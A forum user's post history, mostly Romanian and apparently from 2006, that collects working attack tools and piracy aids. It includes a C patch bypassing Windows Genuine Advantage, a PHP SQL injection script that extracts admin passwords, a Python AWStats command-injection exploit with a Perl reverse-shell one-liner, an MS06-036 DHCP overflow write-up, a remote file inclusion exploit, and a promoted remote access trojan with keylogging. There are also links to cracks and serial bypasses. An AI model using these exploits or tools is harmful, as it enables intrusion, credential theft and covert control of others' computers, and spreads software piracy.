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Everything posted by darkking

  1. /* Name: NsT - Windows Genuine Advantage Validation Patch (1.5.532.0) Copyright: [N]eo [S]ecurity [T]eam Author: HaCkZaTaN Date: 20060606 Version: 0.5 Disclamer: This info is provided ONLY as a Proof-Of-Concept, so the author and all nst members can not be responsability of the use that you take with this PoC. USE IT AT YOUR OWN RISK! Description: This patch is designed as a PoC of a bypass method which demostrate, the easly way to get free updates just patching some bytes to the dll that certificates the MS Windows Copy. Updated To 1.5.532.0 */ #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <string.h> typedef struct bytepair BYTEPAIR; struct bytepair { long offset; unsigned char old; unsigned char new; }; static const BYTEPAIR byte_pairs[6]= { {0x303BA, 0x90, 0x8B}, {0x303BB, 0x90, 0x85}, {0x303BC, 0x6A, 0x60}, {0x303BD, 0x00, 0xFF}, {0x303BE, 0x58, 0xFF}, {0x303BF, 0x90, 0xFF}, }; int main() { unsigned short i; int LegitCheckControl; unsigned char check; printf("n& #092;t?????????????????????????????????????????????????????????????n" "& #092;t????????????????????????????????????????????????????????????n" "t?? ??n" "t?? [N]eo [S]ecurity [T]eam - [N][S][T] ??n" "t?? Windows Genuine Advantage Validation Patch ??n" "t?? Version 0.5 ??n" "t?? ??n" "t?? LegitCheckControl.dll ??n" "t?? *** For Version: *** ??n" "t?? -> 1.5.532.0 ??n" "t?? ??n" "t?? ??????? ??????? ???? ?? ?? ???? ???????????????? ??n" "t?? ??? ???? ?? ?? ??? ?? ??? ??? ??? ?? ?? ?? ??? ??n" "t?? ??? ? ??? ?? ?? ??? ?? ??? ??? ?? ??? ??n" "t?? ??? ? ??? ?? ?? ??? ???? ??? ??? ?? ??? ??n" "t?? ??? ? ???? ?? ??? ????? ??? ??? ?? ??? ??n" "t?? ??? ? ??? ?? ??? ??? ??? ??? ?? ??? ??n" "t?? ??? ? ??? ?? ??? ?? ??? ??? ??? ?? ??? ??n" "t?? ??? ??? ?? ?? ??? ? ?? ??? ??? ???? ??? ??n" "t?? ??? ?? ??? ??? ??? ??? ??n" "t?? ???? ??? ???? ???? ???? ???? ??n" "t?? ??n" "t?? This is my last work as NST member ??n" "t?? Dedicated to all my Teammates: ??n" "t?? ??n" "t?? [ HaCkZaTaN ..... ] ??n" "t?? [ Paisterist ..... ] ??n" "t?? [ Daemon21 ..... ] ??n" "t?? [ Link ..... ] ??n" "t?? [ K4P0 ..... ] ??n" "t?? [ g30rg3_x ..... ] ??n" "t?? ??n" "t?? [ [url]http://www.neosecurityteam.net[/url] ] ??n" "t?? [ [url]http://www.neosecurityteam.info[/url] ] ??n" "t?? ??n" "& #092;t?????????????????????????????????????????????????????????????n" "t ????????????????????????????????????????????????????????????nn"); getchar(); printf("Verifying LegitCheckControl.dll..."); LegitCheckControl = open("LegitCheckControl.dll", O_RDWR); if(LegitCheckControl == -1) { printf(" FAILn"); perror("LegitCheckControl.dll"); getchar(); return 1; } else printf(" DONEn"); printf("Validating LegitCheckControl.dll..."); for(i = 0; i < 3; i++) { if((lseek(LegitCheckControl, byte_pairs[i].offset,SEEK_SET) == -1)) { perror(" ! lseek"); getchar(); return 1; } if((read(LegitCheckControl,&check,1) != 1)) { perror(" ! read"); getchar(); return 1; } if(check != byte_pairs[i].old) { fprintf(stderr, "n -> There is a problem validating the DLL, Seems to be Already Patched or Version Not Supportednn -> Aborting..."); getchar(); return 1; } } printf(" DONEn"); printf("Applying patch..."); for(i=0; i<6; i++) { if((lseek(LegitCheckControl, byte_pairs[i].offset,SEEK_SET) == -1)) { perror(" ! lseek"); getchar(); return 1; } if((write(LegitCheckControl, &byte_pairs[i].new, 1) != 1)) { perror(" ! write"); getchar(); return 1; } } printf(" DONEn"); close(LegitCheckControl); printf("Patch Completed!!!nEnjoy The Updates :)n"); printf("nHit Any Key to Exit"); getchar(); return 0; } Credits: HaCkZaTaN
  2. <? /* ------------------------------------------------------------------------------------------------------------ --------Gnu turk all versions simple get admin uname & pass without hash blind sql injection exploit--------------- -------------Powered by p2y --------------- ---------------Use it at ur own RisK ---------------------- ------------------------------------------------------------------------------------------------------------ p2y@p2y:~/Desktop/projects$ php gnuturk.php /portals/gnuturk/ 1 -------------------------------- Powered by p2y Admin username : p2y Admin password : sanane N0w go 2 [url][/url] and login with this inf0rmation Cuz n0where is Secure En0ugh ... -------------------------------- */ //simple get admin username && pass exploit by p2y error_reporting(0); $site=$argv[1]; $path=$argv[2]; $id=$argv[3]; if($site && $path && $id) { if(!ereg("http",$site)) $site="http://".$site; $sql="mods.php?go=Forum&p=vtop&t_id=-2%20Union/**/Select/**/1,2,username,password,5,6,7,8,9/**/From/**/gtp_admins/**/WHERE/**/id=$id/*"; $url=$site.$path.$sql; $html=file_get_contents($url); $tmp=explode("/*>",$html); $rtmp=explode("</a>",$tmp[1]); $a_username=$rtmp[0]; $tmp=explode('<td class="forum_msg" valign="top">',$html); $rtmp=explode("</td>",$tmp[1]); $a_pass=$rtmp[0]; echo "--------------------------------n"; echo "Powered by p2yn"; echo "Admin username : $a_usernamen"; echo "Admin password : $a_passn"; echo "N0w go 2 $site$path"."admin/ and login with this inf0rmationn"; echo "Cuz n0where is Secure En0ugh ...n"; echo "--------------------------------n"; } else { echo "--------------------------------n"; echo "Powered by p2yn"; echo "Enter host path admin idn"; echo "usage = php p2y.php /gnu/ 1n"; echo "Cuz n0where is Secure En0ugh ...n"; echo "--------------------------------n"; } ?> Dork:GNUTURK PORTAL SYSTEM
  3. AWStats 6.x Migrate CMD Injection Connect-Back Exploit #!/usr/bin/env python # [url]http://secunia.com/advisories/19969/[/url] # by [mail]redsand@blacksecurity.org[/mail] # May 5, 2006 - HAPPY CINCO DE MAYO # HAPPY BIRTHDAY DAD # private plz # # sh0utz: felinemenace, pulltheplug.org, str0ke/milw0rm, and lets not forget #black # darkeagle/uKT, 0x557, and the ol' gang on DARPA # # # redsand@jinxy ~/ $ nc -l -p 31337 -v # listening on [any] 31337 ... # connect to [] from blacksecurity.org [] 53377 # id # uid=81(apache) gid=81(apache) groups=81(apache) # import sys, socket, base64 import urllib2, urlparse, urllib # perl 1 line tcp connect-back code # needs ip & port cmd = 'perl -e '$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };''; class rbawstatsMigrate: __url = '' __user = '' __password = '' __auth = False __chost =False __cport = False def __init__(self,host=False, ur=False, ps=False, chost=False, cport=False): if host: self.__url = host if ur: self.__user = ur if ps: self.__password = ps if ur or ps: self.__auth = True if chost: self.__chost = chost if cport: self.__cport = cport url = urlparse.urlsplit(self.__url) i = url[1].find(';') if i >= 0: self.__parsed_host = url[1][:i] else: self.__parsed_host = url[1] def probe(self): cphost = socket.gethostbyname_ex(self.__chost) my_cmd = cmd % (cphost[2][0],self.__cport) url_xpl = { "config": self.__parsed_host, "migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host) # "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host) } #if self.__url[len(self.__url) -1] != '?': # url_xpl = '?' + url_xpl url = self.__url url_xpl = urllib.urlencode(url_xpl) try: req = urllib2.Request(url, url_xpl) if(self.__auth): b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1] req.add_header('Authorization', "Basic %s"% b64str) req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org") req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1') req.add_header('Accept-Language','en-us') req.add_header('Accept-Encoding','deflate, gzip') req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security") req.add_header('Connection' ,'Keep-Alive') req.add_header('Cache-Control','no-cache') q = urllib2.urlopen(req) except IOError, e: print "FAILED %s" % e sys.exit(0) print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport) sys.exit(0) user=False pas=False url=False chst=False cprt=False print "[BL4CK] AWStats CMD Injection Exploit by [mail]redsand@blacksecurity.org[/mail]" print "http://secunia.com/advisories/19969/" print "http://blacksecurity.org - f0r my h0mi3s" argc = len(sys.argv) if(argc <= 3): print "USAGE: %s [url]http://host/awstats.pl[/url] <connect back host> <connect back port> [username] [password] " % sys.argv[0] print "t* Support 401 HTTP Authentication" sys.exit(0) if(argc > 1): url = sys.argv[1] if(argc > 2): chst = sys.argv[2] if(argc > 3): cprt = sys.argv[3] if(argc > 4): user = sys.argv[4] if(argc > 5): pas = sys.argv[5] red = rbawstatsMigrate(url, user, pas, chst, cprt) red.probe() Download Sursa: BlackSecurity
  4. super faine, cel putin primul e tare de tot merci 0x90.
  5. ok...SLK, iei o copie curata de win xp - cea care ai folosit-o si acum. o pui pe hard, si pui inapoi doar schimbarile pt. GUI la instalare. adaugi in directorul i386: [URL="http://rapidshare.de/files/33291145/WINNT.SIF"][U][COLOR=#0000ff]http://rapidshare.de/files/33291145/WINNT.SIF[/COLOR][/U][/URL] MD5: F3A2F504CCC37920975265F7E55DF68E ca sa nu mai ceara serial la instalare. adaugi ca update: [URL="http://rapidshare.de/files/33291307/KB905474.exe"][U][COLOR=#0000ff]http://rapidshare.de/files/33291307/KB905474.exe[/COLOR][/U][/URL] MD5: 3A209311335D0156B9C9F0BC97398116 apoi, in windows start-up, pui sa ruleze prima data asta: [URL="http://rapidshare.de/files/33291412/Windows_XP_Validation_Patcher.exe"][U][COLOR=#0000ff]http://rapidshare.de/files/33291412/Windows_XP_Validation_Patcher.exe[/COLOR][/U][/URL] MD5: 9830942972C05555CDAD805F5FC33329 La tema o sa fac eu unele schimbari... Edit: SLK, trimite-mi tema pe mess vezi ca sunt invisible
  6. darkking


    vorbesti cu baietii si ii faci o oferta care n-o poate refuza sau, daca chiar nu faci spam il reclami la ANISP
  7. da, wga bugged. nu este dezactivat. tema, da erori si chiar nu merge. edit: vb maine pe mess
  8. bug to fix: cd-ul nu este bootabil.
  9. Recomposit is a digital matting(masking and inverse calculation) and composition tool, it support two advanced masking (digital matting) methods: Bluescreen also called chroma key technology and inside/Outside edge. Recomposit can help you isolate the forground subjects from background with all edge information keeped, such as hair and semitransparent area. The Recomposit also provide full environment for further composition without other software's supports. In extended edition, the Recomposit support Photoshop as its plugins. About matting technology: The bluescreen matting tech. is invented for the requirements of real-time matting, which is wide used in making movie and TV broadcast. The chroma key means separate the foreground subject with background by their difference in hue(chroma) channel. The photographer take the photo with a specified background with constant color, normally, it is blue or green, so the computer can know where is background and where is foreground, then separate them in realtime, automatically. The inside/outside matting can be applied on most photos. The inside edge of object means a selection inside the object and close to its real edge. And the outside edge means selection cover all pixels of the object and close to its edge. The area between inside and outside is the edge of object and the semitransparent part. The programe will calculate the real mask by the user specified inside/outside edge. Recomposit so far as we know is the only one in world which combine two advanced matting methods together. This the standard standanlone verison For other normal user who seldom need Photoshop as his workspace,he can choose 'Export layer to PNG file' function instead(The export/import way may not be so efficient). To save cost of normal user,the plugins is not included in standard edition. download: [url]http://www.stepok.net/eng/dl/RCESetup.exe[/url] crack (by Eithel): [url]http://www.mytempdir.com/928177[/url]
  10. darkking


    pacat, dar cum a spus si Scr[e|e]ch, poate ne spui si noua care e problema, sa vedem, cine stie, poate exista ceva care te-ar putea ajuta sau, nu stiu, sa-ti schimbi ideea. oricum, te vom astepta sa revii...
  11. ok, patch 1. include: - 2 seturi de icoane noi. model 1: model 2: - muBliner - sa nu mai fim frecati la creier de windows update ;P - windows updates downloader - pentru a alege ce update-uri sa downloadam - winrar 3.60 beta 8 corporate edition Edit: am uitat link-ul [url]http://rapidshare.de/files/33198834/patch_1.rar[/url] MD5: 1B0FBC1CC3E27E1296D95DB85DE7143E SLK, te rog sa te ocupi tu de integrare.
  12. ai undeva, in setari sau nu stiu exact unde, calea spre forum, care e de tipul: forum/index.php tu fiind deja in /site/forum automat o sa treaca la un nou director, adica, /site/forum/forum/index.php rezolvarea, mai greu sa ti-o dau pt. ca nu stiu exact de unde preia link-urile (baza de date) sau pur si simplu un config
  13. da, inca o problema... sa spunem ca ne uitam la un subiect. daca dam click sus in meniu pe forum, ne trimite la o pagina inexistenta: [url]http://rst-crew.net/forum/forum/index.php[/url]
  14. ok...veriunea de test. [url]http://www.demonoid.com/files/download/HTTP/461878/9901072[/url] Daca sunt probleme va rog sa le postati
  15. MS06-036 - DHCP Client Service Vulnerability in DHCP Client Service Could Allow Remote Code Execution (91438b) http://www.microsoft.com/technet/security/Bulletin/MS06-036.mspx The DHCP API has a stack-based overflow in the misuses of additional DHCP options. By appending a severely long domain name (option 15) we can overwrite the SEH at the end of the stack. The trick to this exploit is that it converts your ascii buffer to unicode on the stack, ergo you become limited it the options you can choose. You have to try 10 or so additional option 250s without null termination. There's a check in dhcpsvc.dll ( 5.0.2195.6685 ) @ offset 7736f3dc (JMP from 0x773656AF): 7736F3DC > 3D F4010000 CMP EAX,1F4 7736F3E1 . 72 05 JB SHORT dhcpcsvc.7736F3E8 7736F3E3 . B8 F3010000 MOV EAX,1F3 7736F3E8 > 8BC8 MOV ECX,EAX The exception is triggered at: (134.17c): Access violation - code c0000005 (first chance) .... eax=00101f14 ebx=00000df1 ecx=01bdffe8 edx=7ffc101c esi=000007c1 edi=0000000b eip=77f87adb esp=01bdf2f4 ebp=01bdf300 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000216 ntdll!RtlOemToUnicodeN+0x4d: 77f87adb 6689791e mov [ecx:0x1e], di ds:0023:01be0006=???? Throwing the exception will allow us to take over the flow of execution. However our original string gets mangled via the RtlOemToUnicodeN() function. A filtered copy of our payload is pushed onto the stack and will overwrite SEH. However this limits our range of return locations significantly. Some Non-Ascii Characters get converted and give us different address ranges we can use to return to: # C5 converts to 253C # BB = 2557 # AA = 00AC # DD = 258C # EE = 03B5 # 88 = 00D6 # 99 = 00EA # F3 = 2591 # B0 = 2264 # 8F = 00c5 Given some of these unique values we can overwrite the SEH with, we're looking for a jmp/call ebx or a pop/pop/retn. Instead we just chose a static location in hopes that our original ascii payload sits there. so we chose a nice fatty location on the stack with a huge sled. (Obviously more time can be spend into making this 100% reliable, however I would certainly never release it. There is a pointer on the stack at esp+8 that will alow us to utlize a pop+pop+ret combination. If you can find a valid region of static memory we can fit past our ascii filter, then you will return at the end of our filtered buffer on the stack. From there it would be trivial to write a unicode stage-2 to search through the stack looking for our ascii payload. See Aitel's BlackHat presentation on unique ways of bypassing unicode filters and advanced stack & heap overflows.) This is not a very quiet exploit, and is only practacle for live penetration tests, however: Combined with an arp spoofing trick, you can make the node invisible by changing the mac address ever so often. The only way to track this down would be to log into the 1st hop route and tracking the mac -> switch -> switch -> port# and the issue a shutdown port# There you have it, I gave you the hack and the fix all at one! We believe in security by identifying both sides of the equation and addressing them as a whole: hack, and anti-hack. Lets call it the karma of exploitation research. Usage: ./bl4ck_ms06_036.py eth0 (the ip really doesn't matter since it's not used in the first place) MS06-036 DHCP Client Credits: BlackSecurity
  16. sau descarcati r57 de pe site-ul void.ru, deschideti cu wordpad, si cautati: $language='ru'; schimbati asta in: $language='eng';
  17. Programmed by: PrinceAli Language: Delphi Release Date: 08/19/2003 Download Size: 475KB Description: extension creator, + Extra 2 abuse part : EXE TO BMP , EXE TO TXT. [url]http://rapidshare.de/files/33174396/sabine.zip[/url] MD5: 9B59261F7D217D7C07B3D0BA2D6E3ADF
  18. Programmed by: Caesar2k Language: Delphi Release Date: 07/09/2006 Download Size: 993.53KB Downloads: 30757 For those fixes to be applied, you need to update your server on the remote machine, there may be unknown problems if you use a new client with an older server, or vice-versa: Screencapture with a better error handling Modified change.php and logger.php scripts Fixed timers with webcam and screencapture Fixed big file downloads and uploads Screencapture is now smaller if you set smaller scale Fixed resume for upload and downloads Fixed screencapture with chat crash bug Changed the way the download folder works, now it will ask if you want to download x files and x folders and the total size of the entire folder Fixed reconnection issue, that the server would disappear when the client crashed or closed, etc. Fixed rename function when downloading uploading Folder properties now show the correct folder size Added timeout for connections, if the server doesnt receive data for 5 minute, it will disconnect and reconnect (the ping is data, so dont worry about connected servers) Next thing to do for the next version: Add unicode support for filenames and unicode fonts for all the menus and contents Fixed order by size in filemanager Fixed "Average Speed" that would stuck at 9b/s when idle Increased timeout for incoming connections, with the old timeout, some data could be lost and the client would hang. Increased from 30 seconds to 10 minutes Download folder will now download EVERYTHING in the folder, and in all subfolders Current feature list of this program: Firewall bypass method: DLL injection Simultaneous direct and reverse connection, all traffic through one port, easier to configure Can inject the dll in multiple processes to ensure functionality Three startup methods Plug-in enabled server and client, with 3 kinds of plugins: generic, client based and extension Easy-to-understand clean client GUI PHP logging enabled server Lossless PNG compression for screencapture and webcam capture Filemanager with all types of functions, including the Download folder function, that will download everything inside the desired folder, including subfolders Configurable ping system and color matching the ping latency (green < 200ms, orange > 200ms and < 500ms, maroon > 500ms and < 1000ms, grey > 1000ms) Turn the remote computer on a SOCKS5 daemon Live keylogger with adjustable font for unicode computers TCP Tunnel to reach services that are in computers behind routers and LANs, like game servers, SOCKS daemons, FTP daemons, virtually anything that cant be reached through routers and LANs Port redirect for a fill & click redirection service Chat with the remote computer Remote IP and Port range scanner, use the speed of the remote computer for doing your port scans Melt server, assign name, configure the server the way you want, show a custom message upon execution Window manager with send keys feature Process manager and module manager. Terminate processes and unload DLLs from remote processes Registry manager that support REG_DWORD, REG_BINARY, REG_SZ, REG_MULTISZ, REG_EXPANDSZ. Create values and keys on-the-fly Clipboard manager, can retrieve up to 32Kb of clipboard data from the remote computer Intuitive webserver, that you can browse and download all the files from the remote machine using your browser Remote shell for executing remote cmd.exe commands and a BATCH and VBS execution function Update your servers with a few clicks and entering your information for the update Transfers queue or multi transfer methods while upload/downloading your files Support for download/upload huge files, up tp 1Pb (pentabyte) Sorting feature for file manager, sorte by filename, size or file type Plugin SDK in two languages to help you develop your own plugins, C++ and Delphi And many more features! Just use and see all of its potential [url]http://rapidshare.de/files/33174066/NRB9.zip[/url] MD5: E1A2BEC494ACBD8416CE638801C7AF1C
      • 1
      • Like
  19. - [script name: MiniPort@l v. 0.1.5 - [script site: http://mlodylis.xcx.pl/ Exploit: [url]http://site.com/[/url][MiniPort@l_Path]/[/url] [url]http://site.com/cmd.txt[/url] cmd Exploit script & app: [url]http://rapidshare.de/files/32983630/miniportal.rar[/url] MD5: 665C1E39012B8D48E78B132ED107AC33 Exploit by Kacper, Devil Team.
  20. mi-au ajuns si mie cd-urile, si in sfarsit am reusit sa le ridic de la posta...(cu greu  ) 10 buc - 8 kubuntu i386 si 2 de x64
  21. eu unul spun ca au sa aiba problema. in primul rand, se stie foarte bine, ca majoritatea PC-urilor sunt folosite pt. jocuri, aici ma refer la PC'urile din lume, care sunt mult mai multi gameri decat programator samd. prima la mana, gamerii nu ar trece la vista, daca acest lucru este adevarat, chiar daca ar ramane, sa spunem peste 3-4 ani pe o platforma invechita (XP). in alta ordine de idei, cei de la microsoft vor ave probleme cu producatorii de harware si de jocuri. deja se stie ce a patit microsoft cu EU, si...cred ca si-o vor lua din nou. personal, mi se falfaie de viitoarea tehnologie, oricum vor trebui cel putin 2 ani pana sa spunem ca vista va fi stabil , macar 90%. se stie asta din tot ce a lansat microsoft pana acum oricum, nu vor putea opri aceasta chestie, e ca si cum ai opri o industrie, desi, nue e bine spus oprit, corect e ca si cum ai stopa din dezvoltare, deoarece atat producatorii de jocuri cat si producatorii de hardware.
  22. alohaÂÂÂÂ
  23. A bored squirel after some time, strated to fuck a nut. After a while, the fox passed over there, and seeing her, said: - WTF are you doing, are you fucking crazy ? - No, i'm fucking nuts, the squirel replyed.
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